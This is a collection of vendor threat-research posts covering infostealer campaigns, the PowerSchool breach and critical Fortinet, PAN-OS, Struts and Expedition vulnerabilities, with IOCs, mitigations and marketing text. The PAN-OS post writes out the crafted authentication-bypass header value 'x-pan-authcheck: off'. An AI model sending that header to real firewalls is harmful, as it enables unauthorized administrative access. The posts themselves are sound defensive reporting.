Strengthening perimeter defenses and reducing exposure of critical management interfaces can significantly mitigate the risk of exploitation. If you are a current client of Palo Alto please contact support@centripetal.ai. Centripetal is also pleased to offer Penetration Testing and Vulnerability Assessment services to help organizations identify vulnerabilities and reduce risk. If interested, please contact our Professional Services team at profservs@centripetal.ai or reach out to your Centripetal Account Representative. Public Resources https://security.paloaltonetworks.com/CVE-2025-0108 https://www.securityweek.com/palo-alto-networks-confirms-exploitation-of-firewall-vulnerability/ https://www.cve.org/CVERecord?id=CVE-2025-0108 https://www.assetnote.io/resources/research/nginx-apache-path-confusion-to-auth-bypass-in-pan-os https://www.greynoise.io/blog/greynoise-observes-active-exploitation-of-pan-os-authentication-bypass-vulnerability-cve-2025-0108 https://www.theregister.com/2025/02/19/palo_alto_firewall_attack/ --- ### [Rha-Rha-Rhadamanthys Stealer Expands Credential Theft And Persistence](https://www.centripetal.ai/threat-research/rha-rha-rhadamanthys-information-stealer) Published: 2025-02-18 Malware Details The origin of the word “Rhadamanthys”, goes back to Greek mythology where he was a legendary figure who ruled as king of Crete. Born to Zeus and Europa, he held the status of demigod and was renowned for his wisdom. Rhadamanthys Stealer is a sophisticated information stealer written in C++ that employs multiple evasion techniques. The malware utilizes a custom packer for code obfuscation and incorporates anti-VM and anti-debugging mechanisms to prevent analysis. It has likely been part-written or coded with LLM assistance due to artifacts observed within Powershell code according to ProofPoint research. For its command and control communication, it establishes connections through HTTP POST requests to its C2 infrastructure. Initial access tactics to disseminate include, but are not limited to, using GoogleAds to distributed fake websites imitating legitimate software platforms like AnyDesk, Zoom, Microsoft Teams and Notepad++. It is often bundled with the authentic software to reduce user suspicion, with these deceptive sites promoted via Google ads that outrank legitimate search results. The malware's primary function is comprehensive data exfiltration. It systematically harvests credentials stored in web browsers, extracts cryptocurrency wallet data, and captures system information including screenshots. The stealer specifically targets authentication tokens, cookies, and stored passwords from multiple browsers. Additionally, it has functionality to compromise password manager data and collect credentials from FTP clients installed on the infected system. The malware maintains persistence through its robust C2 communication channel while actively evading detection mechanisms. Rhadamanthys Stealer is operated as a Malware-as-a-Service (MaaS) model, where cybercriminals can purchase subscriptions to use the malware through underground marketplaces. However, a key differentiator of what could be commodity malware, is the service model offered by the threat actor which includes regular updates, technical support, and a web panel for managing infected systems, making it accessible to threat actors with varying levels of technical expertise. Rhadamanthys Stealer v0.9 was observed, by X user, @g0njxa, to still be online as of February 10, 2025 with it’s first update of 2025 adding features like an increased collection capacity for browser extensions and additional persistence framework to support auto-start and long-term system residency. Centripetal’s View In the past month, the CleanINTERNET® service observed outbound web traffic events to microsoft.teams-live[.]com 82.221.136[.]26. The trigger domain was observed to use a traffic distribution system (TDS) to direct victims to various landing pages dependent on their browser values, amongst which was an alleged Microsoft Teams download page. It was observed that the victim device downloaded “application_setup[.]exe”(URLScan) which contained what is suspected by open-source intelligence threads to be malicious payloads for Cobalt Strike and Rhadamanthys Stealer. When reviewing what coverage Centripetal offered its customers on this specific campaign, a general enhanced IOC coverage is expected as time passes. This behavior is generally expected as IOCs are identified and enter CTI blocking. In this specific campaign, complete BDN coverage of observed and attributed IOCs has been achieved by threat intelligence providers. By the time the Rhadamanthys IOCs were observed in customers environments, Centripetal had a complete BDN coverage and a high percentile of coverage observed on the cited IPs. The below figure shows the domains that had the longest durations of being undetected from their initial creation to their first appearance in CTI. It is surprising to see the top four offending domains are generic Top Level Domains (gTLD) with .space, .site, .store and .phd. The flora .live domains have multiple attributes that would suspect them to be dictionary domain generated algorithms (DDGAs) and as such entered into CTI quickly after their creation. Given historically threat actors frequently leveraged DDGAs and DGAs maliciously, this is not an unexpected result. To dig into the domains a little further, the distribution of their registrars are relatively small. The Top offender of the registered domains is NameCheap, a reputable registrar option that is used extensively both legitimately and abused by threat actors due to its affordability and accessibility. Due to their popularity with threat actors, both NameCheap and NiceNIC are featured in the list of top three domain Registrars by Phishing domains as published by the Cybercrime Information Center - a repository for studies, measurements, data sets, statistics, and analyses of global security threats in their latest assessment from August to October 2024 (source: CCIC). Unsurprisingly, 91% of the campaign related domains were registered with these two registrars. With 8% of campaign related domains, Tucows was found to be 13th on the CCIC Phishing Domains List. Historically, the malware author usually did not discriminate in who the malware was distributed to - only to remark in one of its earliest releases: “as long as the target is not located in the commonwealth of independent states”. From the analysis of the CleanINTERNET customer base, the IOCs most frequently hit in the education and healthcare industry, which would align with demographic targeted with advertising campaigns which masqueraded the payloads in “legitimate” and well-known tools like NotePad++, Teamviewer and, as observed in our customer’s environment, Microsoft Teams. As Rhadamanthys evolved its sophisticated MaaS model with ever transient techniques and tactics in its dissemination dependent on the buyer, its IOCs continue to be identified and mitigated in a timely manner by the threat intelligence community. However, it is important to note that complete IOC coverage was not observed by a single threat intelligence provider alone. The consolidation of CTI into a multi-faceted defense was the key to providing solid IOC coverage against this threat. Centripetal is also pleased to offer Penetration Testing and Vulnerability Assessment services to help organizations identify vulnerabilities and reduce risk. If interested, please contact our Professional Services team at profservs@centripetal.ai or reach out to your Centripetal Account Representative. Resources https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys https://research.checkpoint.com/2024/massive-phishing-campaign-deploys-latest-rhadamanthys-version/ https://any.run/report/39f66690aae07bf9f1f4a5470409f187aff4eb3cd4a1a9ce6b76e88c263a5adb/724715d3-1ecd-4688-8358-5e62c9ddf8e5 https://x.com/CyberRaiju/status/1882196339569901893 https://threatfox.abuse.ch/ioc/1392440/ https://cybersecuritynews.com/fake-microsoft-teams-page-drops-malware-on-windows/ https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2025-01-22-IOCs-for-malware-from-fake-Microsoft-Teams-site.txt https://urlscan.io/result/646d87f8-c862-44e8-a995-3551d32a69d5/#summary https://urlscan.io/result/c1fb78d5-be17-4c7d-b949-26f86ab45a93/ https://x.com/g0njxa/status/1888978231249801323 https://static1.squarespace.com/static/63dbf2b9075aa2535887e365/t/66cde404c8345e766972319c/1724769286084/PhishingLandscape2024.pdf https://blog.talosintelligence.com/suspected-coralraider-continues-to-expand-victimology-using-three-information-stealers/ https://outpost24.com/blog/rhadamanthys-malware-analysis/ https://research.checkpoint.com/2023/rhadamanthys-the-everything-bagel-infostealer/ https://cofense.com/blog/new-maas-infostealer-malware-campaign-targeting-oil-gas-sector/ Repos with IOCs https://github.com/CybervergentTI/THREAT-INTELLIGENCE-REPO/blob/REPO/Rhadamanthys https://github.com/CybervergentTI/THREAT-INTELLIGENCE-REPO/blob/REPO/Rhadamanthys2 --- ### [Lumma Stealer Distributed Through Fake Reddit Domains](https://www.centripetal.ai/threat-research/lumma-stealer-distributed-through-fake-reddit-domains) Published: 2025-02-14 A new campaign distributing the notorious Lumma Stealer malware has been discovered by security analyst Crep1x at Sekoia. Threat actors are utilizing over 80 second-level domains to generate over 1,000 fully qualified domain names impersonating Reddit and WeTransfer. Websites impersonating Reddit feature a fake thread designed to deceive victims into downloading the malware. While it remains unclear how users are redirected to these malicious domains, it is believed that SEO poisoning, combined with various social engineering tactics, may be to blame. The campaign aims to steal sensitive data, including login credentials, financial information, and other valuable assets from victims. Attack Chain Malicious domains designed to impersonate Reddit and WeTransfer Domain names contain the words "reddit" or "wetransfer" at the beginning, followed by numbers or special characters, to appear authentic Victims are redirected to a convincing fake Reddit page displaying a fraudulent thread Attackers use valid SSL certificates with padlock symbols to suggest secure connections (Cyber Security News, 2025)   The victim is redirected to a malware-hosting WeTransfer page A seemingly legitimate tool or software link is embedded in the fake Reddit thread. The download button delivers the Lumma Stealer payload (Bleeping Computer, 2025)   Payload is executed Once installed, Lumma Stealer communicates with a command-and-control server (C2) and exfiltrates sensitive data, including: Credentials Cryptocurrency wallet information Session tokens Indicators of Compromise ( IOCs) Security analyst Crep1x at Sekoia has made available a GitHub repository containing a list of subdomains hosting fake "Reddit" and "WeTransfer" webpages. Mitigation Strategies The campaign has employed similar tactics impersonating various reputable platforms in order to deliver malware. To counter the growing threat of these types of attacks, the following guidelines are recommended: Verify the website URL - Always check for potential fake domains Implement multi-factor authentication (MFA) - Adds an extra layer of protection against stolen credentials Conduct user training - Educate users to recognize and avoid phishing attacks Update & Patch - Ensure anti-malware software and operating systems are up to date Centripetal’s Perspective Centripetal has been alerted to this campaign and is actively monitoring its developments. While it is important to remain cautious and vigilant for suspicious activity, we want to assure our users that our threat intelligence provides extensive coverage against this threat and its indicators of compromise (IOCs). Our intelligence feeds are continuously updated to detect and mitigate these types of attacks. CleanINTERNET® will continue to deliver dynamic, threat intelligence-based protection against known indicators of compromise, reducing threat actors' ability to launch successful attacks. Centripetal’s Coverage Coverage analysis of Centripetal’s intelligence feeds shows a growing number of ingested Indicators of Compromise (IOCs) leading up to the reported incident on January 20, 2025, with overall coverage at 80% then, reaching 100% as of January 26th, 2025. (Figure 2) A deeper analysis of each domain name registration date, along with dates reported in threat intelligence, provides insight into the average time these domains remained undetected or unused by the threat actor. Overall, most domains appeared in threat intelligence feeds within a few days of creation, some as early as the next day, with an average detection time of 4 days. The majority of these malicious domains were registered between December and early January. Our extensive coverage ensures that our customers remain protected throughout its development. (Figure 3) Conclusion The discovery of this large phishing campaign to deliver malware highlights the increasing sophistication of cyber threats. Through impersonating trusted platforms like Reddit and WeTransfer, attackers successfully trick users into downloading Lumma Stealer—malware specifically designed to steal sensitive data. Deceptive tactics, such as the use of valid SSL certificates and slight variations in domain names, further complicate detection, making user awareness and proactive security measures essential. To mitigate the risks associated with this campaign users must continue shielding, remain vigilant by verifying website URLs, enable multi-factor authentication, update and patch anti-malware tools and operating systems and undergo regular cybersecurity training. By adopting these precautions, individuals and businesses can strengthen their defenses against phishing attacks and malware infections. Centripetal is pleased to offer Penetration Testing and Vulnerability Assessment services to help organizations identify vulnerabilities and reduce risk. If interested, please contact our Professional Services team at profservs@centripetal.ai or reach out to your Centripetal Account Representative. Resources The Bleeping Computer- Hundreds of fake Reddit sites push Lumma Stealer malware GitHub - Repository containing a list of IOCs Tech Radar - Fake Reddit sites found pushing Lumma Stealer malware Cyber Security News - 1,000+ Malicious Domains Mimic Reddit & WeTransfer To Deliver Malware --- ### [Fortinet Zero Day Authentication Bypass Grants Super Admin Access](https://www.centripetal.ai/threat-research/fortinet-zero-day-authentication-bypass-grants-super-admin-access) Published: 2025-01-16 Summary: Fortinet has confirmed a critical zero-day vulnerability, CVE-2024-55591, in its FortiOS and FortiProxy systems, allowing attackers to bypass authentication and gain super-admin privileges through… By Bruce Skillern - Intelligence Operations Analyst, CentripetalOverviewOn January 14, 2025 Fortinet confirmed a critical zero-day vulnerability, CVE-2024-55591, in Fortinet’s FortiOS and FortiProxy systems that has been actively exploited in the wild. This authentication bypass vulnerability allows attackers to gain super-admin privileges via crafted requests to the Node.js WebSocket module, enabling unauthorized access to firewalls, rogue administrative account creation, and configuration changes. Affected products include FortiOS versions 7.0.0 to 7.0.16 and FortiProxy versions 7.0.0 to 7.0.19 and 7.2.0 to 7.2.12. This vulnerability poses a significant threat to organizations relying onFortinet devices for critical network security (Fortinet, 2025; Help Net Security, 2025). Technical DetailsVulnerability Type: CWE-288 (Authentication Bypass Using an Alternate Path or Channel)CVSS Score: 9.6 (Critical)Affected Versions:FortiOS: 7.0.0 to 7.0.16 (Upgrade to 7.0.17 or above)FortiProxy:7.2.0 to 7.2.12 (Upgrade to 7.2.13 or above)7.0.0 to 7.0.19 (Upgrade to 7.0.20 or above) (Fortinet, 2025).  Exploitation ProcessInitial Exploit: Attackers exploit the vulnerability using crafted WebSocket request to bypass authentication (Help Net Security, 2025).Privilege Escalation: New administrative accounts are created with super-admin privileges (BleepingComputer)Configuration Manipulation: Firewall policies are altered, rogue SSL VPN portals are added, and unauthorized tunnels are established (thehackernews,2025)Lateral Movement: Extracted credentials enable further access and compromise within the network (Help Net Security, 2025). Attack CampaignThe exploitation began in mid-November 2024 and followed four distinct phases:Vulnerability Scanning: Automated scans to identify vulnerable systems (November 16–23, 2024).Reconnaissance: Configuration changes and initial access validation (November 22–27, 2024).SSL VPN Configuration: Creation of rogue accounts, VPN portals, and tunnels (December 4–7, 2024).Lateral Movement: Credential extraction and deeper network penetration (December 16–27, 2024) (BleepingComputer, 2025; Help Net Security, 2025). Indicators of Compromise (IoCs)Suspicious Logs:Successful administrative logins via the jsconsole interface from unfamiliar IPs.Creation of new administrative accounts with random usernames (BleepingComputer, 2025). Threat Actor Actions:Creation of rogue admin and local accounts.Changes to firewall policies and addition of SSL VPN portals.Establishment of unauthorized VPN tunnels for network infiltration (cybersecuritynews, 2025; thehackernews, 2025). Malicious IP Addresses: 1.1.1[.]1    87.249.138[.]47127.0.0[.]1137.184.65[.]712.2.2[.]2149.22.94[.]378.8.8[.]8155.133.4[.]1758.8.4[.]4157.245.3[.]25123.27.140[.]65167.71.245[.]1045.55.158[.]4731.192.107[.]16564.190.113[.]2537.19.196[.]65(cybersecuritynews, 2025; BleepingComputer, 2025; Fortinet, 2025). Mitigation StepsApply Patches: Upgrade to FortiOS version 7.0.17 or higher. Upgrade to FortiProxy version 7.0.20 or 7.2.13 or higher (Fortinet, 2025).Restrict Public Exposure: Disable HTTP/HTTPS administrative interfaces or restrict access using local-in policies (Fortinet, 2025).Monitor Logs for IoCs: Regularly analyze logs for unusual admin activity or account creation.Block Malicious IPs: Implement firewall rules to block known malicious IPs.Harden Network Defenses: Enforce network segmentation and monitor VPN activity.Engage Incident Response: Review and remediate unauthorized configuration changes. Vendor ResponseFortinet has released patches addressing CVE-2024-55591 and advised customers to upgrade immediately. The company has also provided guidance, including disabling vulnerable interfaces and monitoring for suspicious activity (Fortinet, 2025). ConclusionThe discovery and exploitation of CVE-2024-55591 highlights the critical need for proactive patch management and limiting public exposure of management interfaces. Organizations should prioritize implementing the latest updates, restrictingaccess to trusted IPs, and monitoring for signs of compromise. Swift action can mitigate the risk of further exploitation and safeguard against potential breaches. Centripetal’s CleanINTERNET® service provides an invaluable layer of defense against authentication bypass vulnerabilities like CVE-2024-55591. By leveraging a dataset of billions of threat indicators, CleanINTERNET® proactively blocks malicious traffic targeting vulnerabilities, including attempts to exploit management interfaces and bypass authentication protocols. With dynamic adaptation to real-time threats and detailed insights into attackpatterns and geographic origins, CleanINTERNET® empowers organizations to adopt an intelligence-centric, data-driven, and proactive defense strategy, ensuring robust protection against evolving cyber threats.If you use Fortinet's FortiOS or FortiProxy please contact support@centripetal.ai.Centripetal is pleased to offer Penetration Testing and Vulnerability Assessment services to help organizations identify vulnerabilities and reduce risk.If interested, please contact our Professional Services team at profservs@centripetal.ai or reach out to your Centripetal Account Representative. References(BleepingComputer)(cybersecuritynews, 2025)(Fortinet, 2025)(Help Net Security, 2025)(Techcrunch, 2025)(thehackenews, 2025) --- ### [PowerSchool Breach Compromises Sensitive K-12 PII and Medical Data](https://www.centripetal.ai/threat-research/powerschool-breach-compromises-sensitive-k-12-pii-and-medical-data) Published: 2025-01-09 Summary: PowerSchool, a widely used cloud-based platform, experienced a data breach reported on December 28, 2024. An unidentified threat actor compromised a PowerSchool maintenance PowerSource account and… PowerSchool, a widely used cloud-based and on-premises platform, experienced a data breach reported on December 28, 2024. The platform helps K-12 schools manage student and teacher information, including Personally Identifiable Information (PII), attendance records, grades, medical information, and Social Security numbers. The breach affected both cloud and on-premises customers after a compromise of maintenance account credentials allowed the threat actor to exfiltrate sensitive data. The exact scope of the data compromised is still being investigated, but it is believed that many schools and districts were affected. PowerSchool's response to the breach included notifying law enforcement, securing the compromised account, engaging with affected schools, and collaborating with cybersecurity firms CrowdStrike and CyberSteward to investigate the incident. Breach Details Affected platform: PowerSource, used for customer support Compromised account: Maintenance user with UID=200A0 Affected customers: Cloud and on-premises deployments of PowerSchool. The exact number is still unknown; a final report with more accurate information will be available on January 17, 2025 Compromise An unidentified threat actor compromised a PowerSchool maintenance PowerSource account and gained access to school databases containing student and teacher records with personal information. The attacker exported this data to a CSV file. PowerSchool discovered the breach on December 28, 2024. Although reconnaissance activities may have occurred earlier, system logs indicate that data compromise began on December 20, 2024. (DataBreaches, 2025) Indicators of Compromise (IOCs) Ukrainian IP address Data exfiltration was first seen to IP address 91.218.50[.]11 registered in Ukraine to Virtual Systems LLC. Assessment System administrators are encouraged to follow these instructions for verifying and auditing logs to determine whether unauthorized data exfiltration occurred. A document authored by Romy Backus, a Student Information Specialist (SIS) at the American School of Dubai, has been made available for public viewing. (Backus, 2025) The steps are outlined as follows: Part 1 Access to ps-log-audit from system management provides logged information that can help identify any unauthorized data exports. Part 2 Three things to look for: UID=200A0 (Compromised maintenance account) Exported files: Students_export.csv / Teachers_export.csv Export record ID (EX): Identifies the fields extracted during each export   Part 3 The Export ID (EX) helps identify the exact fields that were exported. Once mass-data logs (Figure 3) are downloaded from the system management, an EX-match should reveal all fields included in each export. (Figure4) Vendor Response PowerSchool has announced that it will proactively communicate with affected school districts, providing a guidance package that includes outreach emails, talking points, and FAQs to help inform affected families and educators (BleepingComputer, n.d.). PowerSchool will also offer: Credit monitoring for affected adults involved in the compromise Identity protection services for minors A final report with more details will be available on January 17, 2025. If you are a current client of PowerSchool please contact support@centripetal.ai. Centripetal is able to offer assistance with the audit of PowerSchool Logs or Network Logs to check for unauthorized access upon request. Centripetal is also pleased to offer Penetration Testing and Vulnerability Assessment services to help organizations identify vulnerabilities and reduce risk. If interested, please contact our Professional Services team at profservs@centripetal.ai or reach out to your Centripetal Account Representative. --- ### [Apache Struts File Upload Flaw Allows Unauthorized Code Execution](https://www.centripetal.ai/threat-research/apache-struts-file-upload-flaw-allows-unauthorized-code-execution) Published: 2024-12-30 Summary: A newly discovered critical vulnerability, CVE-2024-53677, in Apache Struts enables remote code execution (RCE) and is actively exploited in the wild using a publicly available Proof-of-Concept. A newly discovered critical vulnerability, CVE-2024-53677, in Apache Struts enables remote code execution (RCE) and is actively exploited in the wild using a publicly available Proof-of-Concept (PoC). Apache Struts is an open-source framework for building Java-based web applications. It helps developers create scalable software solutions, that powers everything from e-commerce websites to financial systems and government platforms. This vulnerability arises from improper handling of file uploads, allowing attackers to exploit path traversal and upload unauthorized files. The flaw impacts Apache Struts versions 2.0.0 to 2.3.37, 2.5.0 to 2.5.33, and 6.0.0 to 6.3.0.2. It poses significant risks to organizations reliant on the deprecated File Upload Interceptor, enabling attackers to execute commands, exfiltrate data, and deploy follow-up attacks (BleepingComputer, 2024; The Hacker News, 2024). Technical Details Vulnerability Type: CWE-434 (Unrestricted File Upload) CVSS Score: 9.5 (Critical) Affected Versions: Apache Struts: 2.0.0–2.3.37, 2.5.0–2.5.33, and 6.0.0–6.3.0.2. Exploitation Process Exploitation: Threat actors manipulate file upload parameters to exploit path traversal vulnerabilities. Malicious files, including web shells, are uploaded into restricted directories, enabling arbitrary command execution (Cybersecurity News, 2024). Post-Exploitation: Execution of arbitrary commands (e.g., Java payloads or encoded PowerShell scripts). Deployment of additional tools for persistence and lateral movement. Enumeration: Attackers validate exploitation by accessing uploaded scripts (e.g., exploit.jsp outputting "Apache Struts"). Initial scans detected from IP address 169.150.226[.]162 (The Register, 2024). Indicators of Compromise (IoCs) Suspicious Files: Uploaded web shells such as exploit.jsp. IP Addresses: 169.150.226[.]162: Detected as the origin of initial exploit scans (The Hacker News, 2024). Malicious Behavior: Path traversal exploitation targeting file upload mechanisms. Execution of unauthorized commands, such as PowerShell and Java payloads. Mitigation Steps Patch Immediately: Upgrade Apache Struts to version 6.4.0 or later (Apache Security Bulletin, 2024). Replace deprecated File Upload Interceptor components with the new Action File Upload Interceptor. Review and Update Code: Implement necessary code updates to support backward-incompatible changes. Analyze Logs and Directories: Investigate logs for evidence of unauthorized file uploads or suspicious activity targeting uploaded scripts (VPNRanks, 2024). Strengthen Network Security: Block unauthorized external traffic and isolate vulnerable systems from the public internet. Threat Hunting: Search for IoCs, including uploaded web shells and unauthorized file uploads. Monitor Systems: Deploy Endpoint Detection and Response (EDR) solutions to detect suspicious behaviors and prevent file upload exploitation. Vendor Response Apache has released patches for CVE-2024-53677, urging organizations to upgrade to version 6.4.0 or later. The new version introduces the Action File Upload Interceptor, providing enhanced security against file upload attacks (Apache Security Bulletin, 2024). Why It Matters Apache Struts underpins critical systems across industries, including government, finance, and telecommunications. Exploitation of vulnerabilities like CVE-2024-53677 recalls incidents like the Equifax breach, demonstrating the potentially catastrophic consequences of delayed mitigation (BleepingComputer, 2024). The active exploitation of CVE-2024-53677 demands immediate attention. Organizations must prioritize patching, adopt secure mechanisms, and actively monitor systems to minimize risks. Delayed action increases the potential for full system compromise and secondary attacks. Centripetal’s CleanINTERNET® service provides a proactive, intelligence-driven defense against vulnerabilities like CVE-2024-53677, which enables remote code execution through improper file upload handling in Apache Struts. Leveraging billions of threat indicators, CleanINTERNET dynamically blocks malicious traffic using real-time global threat feeds and augmented human analysis, proactively protecting organizations from exploitation attempts involving known IoCs. This approach ensures reduced attack surface, enhanced security operations, and uninterrupted business continuity, enabling organizations to adopt a proactive and adaptive cybersecurity strategy against evolving threats. If you are a current user of Apache Struts please contact support@centripetal.ai. Centripetal is pleased to offer Penetration Testing and Vulnerability Assessment services to help organizations identify vulnerabilities and reduce risk. If interested, please contact our Professional Services team at profservs@centripetal.ai or reach out to your Centripetal Account Representative. Resources https://www.bleepingcomputer.com/news/security/new-critical-apache-struts-flaw-exploited-to-find-vulnerable-servers/ https://thehackernews.com/2024/12/patch-alert-critical-apache-struts-flaw.html https://nvd.nist.gov/vuln/detail/CVE-2024-53677#VulnChangeHistorySection https://www.vpnranks.com/uk/news/critical-apache-struts-flaw-remote-code-execution-looms/ https://www.theregister.com/2024/12/17/critical_rce_apache_struts/ --- ### [PAN-OS Authentication Bypass and Privilege Escalation Vulnerabilities](https://www.centripetal.ai/threat-research/security-bulletin-pan-os-authentication-bypass-and-privilege-escalation-vulnerabilities) Published: 2024-11-22 Summary: On November 19, 2024, Palo Alto Networks disclosed two critical vulnerabilities in its PAN-OS software, CVE-2024-0012 an Authentication Bypas, and CVE-2024-9474 a Privilege Escalation. On November 19, 2024, Palo Alto Networks disclosed two critical vulnerabilities in its PAN-OS software, CVE-2024-0012 an Authentication Bypas, and CVE-2024-9474 a Privilege Escalation. These vulnerabilities enable attackers to gain unauthorized administrative access and escalate privileges to root level. Exploitation of these vulnerabilities, observed in the wild, has been attributed to a targeted campaign dubbed Operation Lunar Peek. Affected Products CVE-2024-0012 (Authentication Bypass) PAN-OS 10.2: Versions prior to 10.2.12-h2 PAN-OS 11.0: Versions prior to 11.0.6-h1 PAN-OS 11.1: Versions prior to 11.1.5-h1 PAN-OS 11.2: Versions prior to 11.2.4-h1 CVE-2024-9474 (Privilege Escalation) PAN-OS 10.1: Versions prior to 10.1.14-h6 PAN-OS 10.2, 11.0, 11.1, 11.2: Same affected versions as CVE-2024-0012 Technical Details CVE-2024-0012 – Authentication Bypass Severity: Critical (CVSS 9.3) Description: Exploitation allows unauthenticated attackers to bypass authentication by supplying a crafted HTTP header (x-pan-authcheck: off) to the PAN-OS management web interface. This grants administrative privileges, enabling configuration tampering and potential exploitation of CVE-2024-9474. CVE-2024-9474 – Privilege Escalation Severity: Medium (CVSS 6.9) Description: This flaw enables authenticated administrators to escalate privileges to root, allowing actions such as disabling security features and compromising system integrity. Exploitation Operation Lunar Peek Exploitation has been observed on devices with exposed management interfaces, particularly in regions with high usage (e.g., United States, India, Mexico). Shadowserver estimates over 11,000 exposed systems globally. Chained Exploitation CVE-2024-0012 facilitates initial access, while CVE-2024-9474 is used for post-exploitation privilege escalation. Attackers deploy PHP webshells (SHA256 hash: 3C5F9034C86CB1952AA5BB07B4F77CE7D8BB5CC9FE5C029A32C72ADC7E814668) for further malicious actions. Available Patches PAN-OS 10.1: Update to 10.1.14-h6 or later PAN-OS 10.2: Update to 10.2.12-h2 or later PAN-OS 11.0: Update to 11.0.6-h1 or later PAN-OS 11.1: Update to 11.1.5-h1 or later PAN-OS 11.2: Update to 11.2.4-h1 or later Palo Alto Networks has also released patches for earlier maintenance releases frequently deployed by customers. Refer to the official advisory from Palo Alto Networks for details, here. Workarounds and Recommendations Mitigations Restrict Management Interface Access Block internet-facing access. Allow access only from trusted internal IPs or secure jump boxes. Enable Threat Prevention Apply Threat IDs (e.g., 95746 and 95747) to block exploits. Best Practices Deploy administrative access best practices. Log administrative actions and monitor for anomalous configuration changes. Conclusion CVE-2024-0012 and CVE-2024-9474 highlight the criticality of securing internet-facing interfaces. Organizations should prioritize patching affected systems, adopt mitigations, and remain vigilant for evolving threats. Additionally, Centripetal’s CleanINTERNET® service can further protect networks by detecting and shielding malicious exploit attempts associated with CVE-2024-0012, CVE-2024-9474 through advanced threat intelligence and real-time traffic filtering. If you are a current client of Palo Alto and use PAN-OS please contact support@centripetal.ai. Centripetal is pleased to offer Penetration Testing and Vulnerability Assessment services to help organizations identify vulnerabilities and reduce risk. If interested, please contact our Professional Services team at profservs@centripetal.ai or reach out to your Centripetal Account Representative. Resources Palo Alto Networks Advisory: PAN-OS Vulnerabilities CVE-2024-0012 and CVE-2024-9474. Available at: Palo Alto Networks Security Advisory Unit42 Report: Operation Lunar Peek and Exploitation of PAN-OS Vulnerabilities. Available at: Unit42 Blog HelpNet Security: Analysis of CVE-2024-0012 Exploits and Mitigations. Available at: HelpNet Security The Register: PAN-OS Vulnerabilities Targeting Global Interfaces. Available at: The Register Censys Analysis: Global Exposure of PAN-OS Interfaces. Available at: Censys --- ### [Palo Alto Networks Expedition Multiple Vulnerabilities (CVE-2024-9463, CVE-2024-9464, CVE-2024-9465, CVE-2024-9466, CVE-2024-9467)](https://www.centripetal.ai/threat-research/palo-alto-networks-expedition-multiple-vulnerabilities) Published: 2024-11-18 Summary: On November 14, 2024, Palo Alto Networks disclosed five critical vulnerabilities in its Expedition configuration migration tool. On November 14, 2024, Palo Alto Networks disclosed five critical vulnerabilities in its Expedition configuration migration tool, a solution designed to simplify the migration of firewall configurations from third-party vendors to Palo Alto Networks' PAN-OS infrastructure. These vulnerabilities—tracked as CVE-2024-9463, CVE-2024-9464, CVE-2024-9465, CVE-2024-9466, and CVE-2024-9467—expose users to risks such as unauthorized access, data leakage, and system compromise. Two vulnerabilities (CVE-2024-9463 and CVE-2024-9465) have been reported as actively exploited in the wild, according to the U.S. Cybersecurity and Infrastructure Security Agency (CISA). Affected Products The following versions of Palo Alto Networks Expedition are impacted by these vulnerabilities: Expedition: Versions prior to 1.2.96 Users running these versions are urged to upgrade to version 1.2.96 or later to secure their systems against exploitation (Palo Alto Networks Advisory, 2024). Technical Details These vulnerabilities result from multiple issues, including OS Command Injection, SQL Injection, improper storage of sensitive information, and Cross-Site Scripting (XSS). Below is a detailed breakdown of each CVE: CVE-2024-9463 - OS Command Injection (Unauthenticated) Severity: Critical (CVSS 9.9) Description: Allows an unauthenticated attacker to execute OS commands as root, exposing sensitive data such as usernames, cleartext passwords, device configurations, and API keys of PAN-OS firewalls Exploitation Status: Actively exploited in the wild CVE-2024-9464 - OS Command Injection (Authenticated) Severity: Critical (CVSS 9.3) Description: Allows an authenticated user to execute OS commands as root, potentially leading to unauthorized data access and exposure of credentials CVE-2024-9465 - SQL Injection (Unauthenticated) Severity: Critical (CVSS 9.2) Description: Enables unauthenticated attackers to access Expedition database contents, including password hashes, usernames, and configurations, and to create or read arbitrary files on the system Exploitation Status: Actively exploited in the wild Indicator of Compromise (IoC): Use the following SQL command to identify potential compromise: mysql -uroot -p -D pandb -e "SELECT * FROM cronjobs;" CVE-2024-9466 - Cleartext Storage of Sensitive Information Severity: High (CVSS 8.2) Description: Stores sensitive information (e.g., usernames, passwords, and API keys) in plaintext, making it accessible to authenticated users CVE-2024-9467 - Reflected Cross-Site Scripting (XSS) Severity: High (CVSS 7.0) Description: Allows attackers to execute malicious JavaScript in the browser of an authenticated user, potentially leading to session theft or phishing attacks Available Patches Palo Alto Networks has issued patches to address all identified vulnerabilities. Users are advised to upgrade to Expedition version 1.2.96 or later, which resolves these issues. During the upgrade, the system automatically removes plaintext files associated with CVE-2024-9466. Workarounds and Recommendations For organizations unable to apply the patches immediately, the following mitigations can reduce exposure: Restrict Access: Limit network access to Expedition systems to authorized users, hosts, or networks only If Expedition is not actively in use, disable it to minimize exposure Credential Rotation: Rotate all Expedition usernames, passwords, and API keys after upgrading Similarly, rotate all credentials associated with PAN-OS firewalls that were processed by Expedition Monitor Systems: Implement enhanced logging and monitoring for unexpected access attempts or abnormal commands The vulnerabilities in Palo Alto Networks Expedition pose significant risks to organizations using the tool for firewall configuration migration. With active exploitation of CVE-2024-9463 and CVE-2024-9465, Palo Alto Networks and CISA strongly advise immediate patching and the application of recommended security practices. Additionally, Centripetal’s CleanINTERNET® service can further protect networks by detecting and blocking malicious exploit attempts associated with CVE-2024-9463, CVE-2024-9464, CVE-2024-9465, CVE-2024-9466, CVE-2024-9467 through advanced threat intelligence and real-time traffic filtering. If you are a current client of Palo Alto and use their Networks Expedition Software please contact support@centripetal.ai. Centripetal is pleased to offer Penetration Testing and Vulnerability Assessment services to help organizations identify vulnerabilities and reduce risk. If interested, please contact our Professional Services team at profservs@centripetal.ai or reach out to your Centripetal Account Representative. --- ### [Risks for Polyfill.io Users](https://www.centripetal.ai/threat-research/risks-for-polyfill-io-users) Published: 2024-06-28 Summary: Funnull acquired polyfill[.]io, leading to malicious code redirecting users to scam sites. Over 100,000 sites are now vulnerable. Earlier this year, a Chinese company named Funnull acquired the polyfill[.]io domain. Subsequently, the polyfill CDN started delivering malicious JavaScript code which was automatically deployed on websites embedding scripts from cdn.polyfill[.]io. Due to this acquisition, this code was used to redirect mobile visitors to scam sites.   Over 100,000 websites using the previously popular Polyfill JS open-source project are vulnerable to attacks that redirect traffic to sports betting and pornography sites. Polyfill.js was used to support outdated browsers with modern functionality and were historically essential for web developers to ensure their applications worked smoothly across various browser versions, acting as a bridge to enable newer JavaScript features on older browsers, thereby 